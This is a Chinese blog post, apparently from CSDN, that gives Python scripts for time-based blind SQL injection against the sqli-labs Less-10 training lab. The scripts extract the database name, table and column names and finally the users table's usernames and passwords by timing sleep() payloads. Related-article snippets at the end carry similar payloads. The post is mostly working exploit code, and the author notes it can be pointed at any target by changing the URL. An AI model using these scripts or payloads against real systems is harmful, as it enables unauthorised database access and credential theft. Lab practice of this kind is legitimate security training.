python脚本实现sql时间盲注

最新推荐文章于 2024-04-30 21:19:09 发布
原创 最新推荐文章于 2024-04-30 21:19:09 发布 · 1k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #sql #web安全

这里用sqli-labs-master第10关举例
在这里插入图片描述
1、爆数据库长度

# coding:utf-8
import requests
import datetime
import time

# 获取数据库名长度
def database_len():
    for i in range(1, 10):
        url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"    #改url
       
        payload = "?id=1\" and if(length(database())>%s,sleep(1),0) --+" % i                 #改闭合
        # print(url+payload+'%23')
        time1 = datetime.datetime.now()
        r = requests.get(url + payload)
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 1:
            print(i)
        else:
            print(i)
            break
    print('database_len:', i)

if __name__ == '__main__':
    database_len()

在这里插入图片描述
做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的

2、爆数据库名

# coding:utf-8
import requests
import datetime
import time

#获取数据库名
def database_name():
    name = ''
    for j in range(1,9):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"    #改url
            payload = "?id=1\" and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (j,i)      #改闭合
            #print(url+payload)
            time1 = datetime.datetime.now()
            r = requests.get(url + payload)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >=3:
                name += i
                print(name)
                break
    print('database_name:', name)

if __name__ == '__main__':
    database_name()

在这里插入图片描述
3、爆表名的ascii码

# coding:utf-8
import requests
import datetime
import time
#爆表的ascii码
def table_name():
    name = ''
    for k in range(0,4):
        for j in range(1,10):
            for i in range(33,127):
                url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"      #改url
                payload = "?id=1\" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))='%s',sleep(3),1) --+" % (k,j,i)
                #print(url+payload)                                                #改闭合
                time1 = datetime.datetime.now()
                r = requests.get(url + payload)
                time2 = datetime.datetime.now()
                sec = (time2 - time1).seconds
                if sec >=3:
                    print(i)
                else:
                    i=i+1
                    continue
    print('table_name:', name)


if __name__ == '__main__':
    table_name()

在这里插入图片描述
将表的ascii转化为字符

def  shuchu():
	a=[101,109,97,105,108,115,114,101,102]
	i=0
	while(i<len(a)):
		print(chr(a[i]))
		i=i+1
shuchu()

在这里插入图片描述
4、爆列的ascii码

# coding:utf-8
import requests
import datetime
import time
#爆列的ascii码
def column_name():
    name = ''
    for k in range(0,2):
        for j in range(1,25):
            for i in range(33,127):
                url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"      #改url
                payload = "?id=1\" and if(ascii(substr((select column_name from information_schema.columns where table_name=\"users\" and table_schema=database() limit %d,1),%d,1))='%s',sleep(3),1) --+" % (k,j,i)
                #print(url+payload)                                                #改闭合
                time1 = datetime.datetime.now()
                r = requests.get(url + payload)
                time2 = datetime.datetime.now()
                sec = (time2 - time1).seconds
                if sec >=3:
                    print(i)
                else:
                    i=i+1
                    continue
    print('column_name:', name)


if __name__ == '__main__':
    column_name()

在这里插入图片描述
将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样

5、爆字段ascii码

# coding:utf-8
import requests
import datetime
import time
#爆字段的ascii码
def ziduan():
    name = ''
    for k in range(0,2):
        for j in range(1,50):
            for i in range(33,127):
                url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"      #改url
                payload = "?id=1\" and if(ascii(substr((select group_concat(id,username,password) from users limit %d,1),%d,1))='%s',sleep(3),1) --+" % (k,j,i)
                #print(url+payload)                                                #改闭合
                time1 = datetime.datetime.now()
                r = requests.get(url + payload)
                time2 = datetime.datetime.now()
                sec = (time2 - time1).seconds
                if sec >=3:
                    print(i)
                else:
                    i=i+1
                    continue
    print('ziduan:', name)


if __name__ == '__main__':
    ziduan()

在这里插入图片描述
将字段ascii码转化为字符

脚本比较简陋,但是自身能力有限,能实现功能即可,有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究

37-5 基于时间SQL 注入 PoC 的 Python 编写
weixin_43263566的博客
04-24 319
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
python实现sql时间盲注
箭雨镜屋
04-26 1147
一、python代码 二、使用方法 三、测试
Python脚本-时间盲注
m0_74317362的博客
09-23 1458
添加了time.sleep(0.05)
帮我写一个时间盲注python脚本
weixin_35757531的博客
01-03 263
时间盲注攻击是一种数据库攻击方法,其目的是通过构造特殊的SQL查询语句来猜测数据库中的数据。在进行时间盲注攻击时,攻击者会在SQL查询中包含一个或多个条件,并通过测量查询的执行时间来判断条件是否成立。 下面是一个使用Python实现时间盲注攻击的示例代码: importtime import requests # 目标数据库地址 url = "http://database.com/query"...
使用python编写sql时间盲注的exp
CC210231的博客
04-05 2051
前言: 前面学习了布尔注的exp,原理是根据页面的两个返回状态来确定注入的语句是否正确执行,从而得到我们想要的数据,但有时候,页面只会返回一种状态,布尔注就无法实行了,此时,我们就要用到另一种注方式:时间盲注,也叫延时注入 延时注入原理: 延时注入是利用sql语句达到延时的目的,在mysql中用的sleep()函数, select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。 我们在exp中怎样利用呢? 我们可以获
Python SQL时间
weixin_45972507的博客
07-03 289
自主博客开发,SQL时间
2024年Python最全Python自动化sql注入:布尔注_布尔注脚
最新发布
2301_82244514的博客
04-30 834
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
时间盲注python脚本.zip
12-28
在本压缩包"时间盲注python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和time_sql_get.py,分别用于POST和GET方法实现时间盲注自动化攻击。 首先,我们来详细了解一下时间盲注的基本原理。当服务器执行...
布尔python脚本.zip
12-28
在给定的压缩包文件"布尔python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔注的Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔注原理**...
Python实现SQLServer数据库注脚本详解
尽管文档中没有直接提及,但实现上述功能的Python脚本很可能使用了`requests`库进行网络请求,使用`threading`进行多线程编程,并使用`pyodbc`或`pymssql`来连接和操作SQL Server数据库。 ### 注意事项 在使用此类...
sqli-labs注脚
06-24
sqli-labs注脚sqli-labs注脚sqli-labs注脚
sql注入(时间盲注脚本,mysql结构)
2401_82760239的博客
04-04 1013
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")print("数据表", table, "第", index, "个字段的长度为", length)print("数据表", table, "第", index, "行数据的长度为", length)print ("目前已知数据库名", database)
pythonsqli-labs15的二分法时间盲注
Programmonkeykin的博客
12-11 4274
1.导入库。 2.按ASCII码从小到大编写常见的符号、字符、数字。 3.编写实验对应库的地址,这里的url根据自己的实际状况而言。 编写get_length函数: 其二分实现的完整代码如下: Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n) 即,如果我们定义的数据长度n刚好等于我们..
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1843
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
sql-labs Time-based注脚
lixiangminghate的专栏
07-14 1115
    sqli-labs lab9/lab10是基于时间注,如果完全用手动注入,费时费力。想到之前写过一篇基于布尔注的博文,于是我把当时脚本中的payload进行了修改,记录于此。    相比之前的脚本,替换了payload。另外,脚本记录了发送请求前的时间和响应返回的时间,比较时间差是否大于payload中设置的sleep时间(因为测试用的服务器就在本地虚拟机里,几乎不会有延迟,所以可以...
基于时间盲注python脚本
weixin_43460822的博客
10-07 2364
思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称. #encoding=utf-8 #时间盲注脚本 import requests import time import datetime #获取数据库长度 def database_len(): #存放跑出的结果 length=0 ...
基于时间sql注入python脚本
weixin_30265103的博客
05-29 645
1 # coding:utf-8 2 import requests 3 import datetime 4 import time 5 6 # 获取数据库名长度 7 8 9 def database_len(): 10 for i in range(1, 10): 11 url = '''http://127.0....
时间盲注脚本——以sqli-labs第十关为例
weixin_52450702的博客
12-14 715
时间盲注脚本
sqli-labs 第九关 基于时间盲注 python 脚本
Mirror_iu的博客
01-25 3219
# @Author:Mirror import time import requests db_len = 0 def get_schema_len (url): len = 0 left = 0 right = 20 while (left <= right): mid = left + (right - left)//2; data = "id=1' and if(length(database())>{},sleep(0.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值